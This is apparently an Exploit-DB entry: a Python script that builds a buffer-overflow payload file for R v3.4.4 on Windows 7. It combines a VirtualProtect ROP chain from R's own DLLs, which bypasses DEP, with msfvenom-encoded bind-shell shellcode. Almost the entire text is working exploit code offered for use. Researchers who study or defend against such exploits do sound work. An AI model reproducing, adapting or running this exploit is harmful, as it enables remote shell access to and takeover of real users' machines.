1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132 | # Exploit Title: R v3.4.4 - Local Buffer Overflow (DEP Bypass)
# Exploit Author: Hashim Jawad
# Exploit Date: 2018-05-21
# Vendor Homepage: https://www.r-project.org/
# Vulnerable Software: https://www.exploit-db.com/apps/a642a3de7b5c2602180e73f4c04b4fbd-R-3.4.4-win.exe
# Tested on OS: Microsoft Windows 7 Enterprise - SP1 (x86)
# Steps to reproduce: under GUI preferences, paste payload.txt contents into 'Language for menus and messages'
# Credit to bzyo for finding the bug (44516)
#!/usr/bin/python
import struct
#root@kali:~# msfvenom -p windows/shell_bind_tcp -e x86/alpha_mixed -b "\x00\x0a\x0d\x0e" -f python -v shellcode
#Payload size: 718 bytes
shellcode = ""
shellcode += "\x89\xe0\xdb\xd2\xd9\x70\xf4\x5b\x53\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x69\x6c\x59\x78\x6c\x42\x77\x70\x33\x30\x37\x70"
shellcode += "\x31\x70\x6b\x39\x6a\x45\x65\x61\x39\x50\x72\x44"
shellcode += "\x6e\x6b\x30\x50\x56\x50\x4e\x6b\x62\x72\x56\x6c"
shellcode += "\x6c\x4b\x31\x42\x34\x54\x4c\x4b\x62\x52\x64\x68"
shellcode += "\x56\x6f\x68\x37\x70\x4a\x61\x36\x55\x61\x79\x6f"
shellcode += "\x6e\x4c\x75\x6c\x73\x51\x51\x6c\x67\x72\x46\x4c"
shellcode += "\x57\x50\x4b\x71\x5a\x6f\x36\x6d\x76\x61\x6b\x77"
shellcode += "\x7a\x42\x39\x62\x76\x32\x73\x67\x6e\x6b\x36\x32"
shellcode += "\x72\x30\x4e\x6b\x73\x7a\x55\x6c\x4e\x6b\x62\x6c"
shellcode += "\x42\x31\x72\x58\x38\x63\x51\x58\x35\x51\x6b\x61"
shellcode += "\x52\x71\x4e\x6b\x72\x79\x31\x30\x57\x71\x78\x53"
shellcode += "\x6c\x4b\x50\x49\x64\x58\x6b\x53\x77\x4a\x70\x49"
shellcode += "\x6e\x6b\x37\x44\x4e\x6b\x67\x71\x4b\x66\x45\x61"
shellcode += "\x69\x6f\x6c\x6c\x49\x51\x6a\x6f\x46\x6d\x57\x71"
shellcode += "\x5a\x67\x56\x58\x39\x70\x42\x55\x4b\x46\x74\x43"
shellcode += "\x53\x4d\x59\x68\x35\x6b\x73\x4d\x47\x54\x64\x35"
shellcode += "\x5a\x44\x36\x38\x6c\x4b\x56\x38\x57\x54\x76\x61"
shellcode += "\x38\x53\x43\x56\x4c\x4b\x64\x4c\x30\x4b\x6c\x4b"
shellcode += "\x33\x68\x35\x4c\x57\x71\x59\x43\x6c\x4b\x36\x64"
shellcode += "\x6c\x4b\x46\x61\x4e\x30\x6b\x39\x63\x74\x47\x54"
shellcode += "\x55\x74\x31\x4b\x43\x6b\x50\x61\x71\x49\x52\x7a"
shellcode += "\x62\x71\x6b\x4f\x6b\x50\x61\x4f\x51\x4f\x32\x7a"
shellcode += "\x6c\x4b\x66\x72\x5a\x4b\x4c\x4d\x71\x4d\x50\x68"
shellcode += "\x76\x53\x45\x62\x65\x50\x75\x50\x31\x78\x73\x47"
shellcode += "\x71\x63\x74\x72\x31\x4f\x62\x74\x75\x38\x50\x4c"
shellcode += "\x70\x77\x55\x76\x36\x67\x49\x6f\x6b\x65\x6d\x68"
shellcode += "\x7a\x30\x73\x31\x55\x50\x65\x50\x36\x49\x78\x44"
shellcode += "\x33\x64\x62\x70\x65\x38\x65\x79\x6d\x50\x30\x6b"
shellcode += "\x43\x30\x39\x6f\x39\x45\x31\x7a\x56\x68\x70\x59"
shellcode += "\x70\x50\x69\x72\x59\x6d\x37\x30\x70\x50\x71\x50"
shellcode += "\x50\x50\x33\x58\x39\x7a\x46\x6f\x79\x4f\x6d\x30"
shellcode += "\x59\x6f\x69\x45\x7a\x37\x75\x38\x65\x52\x43\x30"
shellcode += "\x37\x61\x63\x6c\x4f\x79\x5a\x46\x31\x7a\x34\x50"
shellcode += "\x30\x56\x31\x47\x45\x38\x39\x52\x79\x4b\x66\x57"
shellcode += "\x42\x47\x59\x6f\x5a\x75\x50\x57\x51\x78\x6c\x77"
shellcode += "\x48\x69\x54\x78\x69\x6f\x6b\x4f\x59\x45\x72\x77"
shellcode += "\x75\x38\x33\x44\x7a\x4c\x75\x6b\x39\x71\x49\x6f"
shellcode += "\x78\x55\x71\x47\x6c\x57\x75\x38\x70\x75\x70\x6e"
shellcode += "\x42\x6d\x35\x31\x79\x6f\x38\x55\x72\x48\x70\x63"
shellcode += "\x42\x4d\x71\x74\x37\x70\x4f\x79\x79\x73\x71\x47"
shellcode += "\x70\x57\x71\x47\x74\x71\x78\x76\x53\x5a\x42\x32"
shellcode += "\x62\x79\x52\x76\x6b\x52\x59\x6d\x35\x36\x79\x57"
shellcode += "\x52\x64\x35\x74\x57\x4c\x37\x71\x43\x31\x4e\x6d"
shellcode += "\x50\x44\x36\x44\x56\x70\x59\x56\x47\x70\x42\x64"
shellcode += "\x46\x34\x70\x50\x36\x36\x50\x56\x50\x56\x71\x56"
shellcode += "\x42\x76\x30\x4e\x73\x66\x76\x36\x66\x33\x76\x36"
shellcode += "\x32\x48\x42\x59\x68\x4c\x55\x6f\x6d\x56\x49\x6f"
shellcode += "\x6b\x65\x4b\x39\x59\x70\x72\x6e\x70\x56\x51\x56"
shellcode += "\x4b\x4f\x34\x70\x51\x78\x34\x48\x4e\x67\x37\x6d"
shellcode += "\x51\x70\x59\x6f\x38\x55\x6d\x6b\x6c\x30\x48\x35"
shellcode += "\x69\x32\x72\x76\x62\x48\x4c\x66\x5a\x35\x4f\x4d"
shellcode += "\x4d\x4d\x69\x6f\x4a\x75\x65\x6c\x67\x76\x73\x4c"
shellcode += "\x47\x7a\x4f\x70\x59\x6b\x4b\x50\x70\x75\x57\x75"
shellcode += "\x6f\x4b\x53\x77\x55\x43\x64\x32\x52\x4f\x51\x7a"
shellcode += "\x53\x30\x46\x33\x4b\x4f\x4b\x65\x41\x41"
'''
Output generated by mona.py v2.0, rev 582 - Immunity Debugger
--------------------------------------------
Register setup for VirtualProtect() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--------------------------------------------
'''
rop = struct.pack('<L', 0x6cacc7e2) # POP EAX # RETN [R.dll]
rop += struct.pack('<L', 0x643cb170) # ptr to &VirtualProtect() [IAT Riconv.dll]
rop += struct.pack('<L', 0x6e7d5435) # MOV EAX,DWORD PTR DS:[EAX] # RETN [utils.dll]
rop += struct.pack('<L', 0x6ca347fa) # XCHG EAX,ESI # RETN [R.dll]
rop += struct.pack('<L', 0x6cb7429a) # POP EBP # RETN [R.dll]
rop += struct.pack('<L', 0x6ca2a9bd) # & jmp esp [R.dll]
rop += struct.pack('<L', 0x64c45db2) # POP EAX # RETN [methods.dll]
rop += struct.pack('<L', 0xfffffaff) # value to negate, will become 0x00000501
rop += struct.pack('<L', 0x643c361a) # NEG EAX # RETN [Riconv.dll]
rop += struct.pack('<L', 0x6ca33b8a) # XCHG EAX,EBX # RETN [R.dll]
rop += struct.pack('<L', 0x6cbef3e4) # POP EAX # RETN [R.dll]
rop += struct.pack('<L', 0xffffffc0) # Value to negate, will become 0x00000040
rop += struct.pack('<L', 0x6ff3a39a) # NEG EAX # RETN [grDevices.dll]
rop += struct.pack('<L', 0x6ca558be) # XCHG EAX,EDX # RETN [R.dll]
rop += struct.pack('<L', 0x6cbe90a8) # POP ECX # RETN [R.dll]
rop += struct.pack('<L', 0x6ff863c1) # &Writable location [grDevices.dll]
rop += struct.pack('<L', 0x6cbe097f) # POP EDI # RETN [R.dll]
rop += struct.pack('<L', 0x6375fe5c) # RETN (ROP NOP) [Rgraphapp.dll]
rop += struct.pack('<L', 0x6c998f58) # POP EAX # RETN [R.dll]
rop += struct.pack('<L', 0x90909090) # nop
rop += struct.pack('<L', 0x6fedfa6c) # PUSHAD # RETN [grDevices.dll]
buffer = '\x41' * 292 # filler to EIP
buffer += struct.pack('<L', 0x6fef93c6) # POP ESI # RETN [grDevices.dll]
buffer += '\x41' * 4 # compensate for pop esi
buffer += rop
buffer += '\x90' * 50
buffer += shellcode
buffer += '\x90' * (5000-292-4-4-len(rop)-50-len(shellcode))
try:
f=open('payload.txt','w')
print '[+] Creating %s bytes evil payload..' %len(buffer)
f.write(buffer)
f.close()
print '[+] File created!'
except Exception as e:
print e
|